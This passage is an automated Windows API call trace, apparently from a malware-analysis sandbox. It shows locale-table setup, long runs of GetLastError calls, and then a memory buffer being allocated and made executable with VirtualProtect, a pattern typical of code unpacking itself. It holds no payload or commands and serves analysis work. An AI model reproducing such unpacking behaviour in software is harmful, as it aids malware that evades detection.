¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0086.754] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x22c) returned 0x8f31d0 [0086.754] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x8f31f8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0086.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fb28, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0086.754] HeapValidate (hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f31d0) returned 1 [0086.754] HeapFree (in: hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f31d0 | out: hHeap=0x8f0000) returned 1 [0086.756] HeapValidate (hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f2f98) returned 1 [0086.756] HeapFree (in: hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f2f98 | out: hHeap=0x8f0000) returned 1 [0086.756] GetLastError () returned 0x0 [0086.756] SetLastError (dwErrCode=0x0) [0086.756] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0086.756] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x22c) returned 0x8f2f98 [0086.756] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x8f2fc0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0086.756] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0086.756] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x22c) returned 0x8f31d0 [0086.756] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x8f31f8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽") returned 256 [0086.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fa28, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0086.757] HeapValidate (hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f31d0) returned 1 [0086.757] HeapFree (in: hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f31d0 | out: hHeap=0x8f0000) returned 1 [0086.757] HeapValidate (hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f2f98) returned 1 [0086.757] HeapFree (in: hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f2f98 | out: hHeap=0x8f0000) returned 1 [0086.759] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x426da0) returned 0x0 [0086.760] HeapValidate (hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f2c98) returned 1 [0086.760] GetLastError () returned 0x0 [0086.761] GetLastError () returned 0x0 [0086.761] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.763] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.764] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.765] GetLastError () returned 0x0 [0086.772] GetLastError () returned 0x0 [0086.772] GetLastError () returned 0x0 [0086.772] GetLastError () returned 0x0 [0086.772] GetLastError () returned 0x0 [0086.772] GetLastError () returned 0x0 [0086.772] GetLastError () returned 0x0 [0086.772] GetLastError () returned 0x0 [0086.772] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.773] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.774] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.775] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.776] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.777] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.778] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0086.779] GetLastError () returned 0x0 [0088.772] LocalAlloc (uFlags=0x0, uBytes=0xf228) returned 0x681df8 [0088.793] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74f30000 [0088.794] VirtualProtect (in: lpAddress=0x681df8, dwSize=0xf228, flNewProtect=0x40, lpflOldProtect=0x19dd48 | out: lpflOldProtect=0x19dd48*=0x4) returned 1 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.843] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.844] GetLastError () returned 0x0 [0088.845] GetLastError () returned 0x0 [0088.845] GetLastError () returned 0x0 [0088.845] GetLastError () returned 0x0 [0088.845] GetLastError () returned 0x0 [0088.846] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.847] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.848] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.849] GetLastError () returned 0x0 [0088.850] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.856] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.857] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () 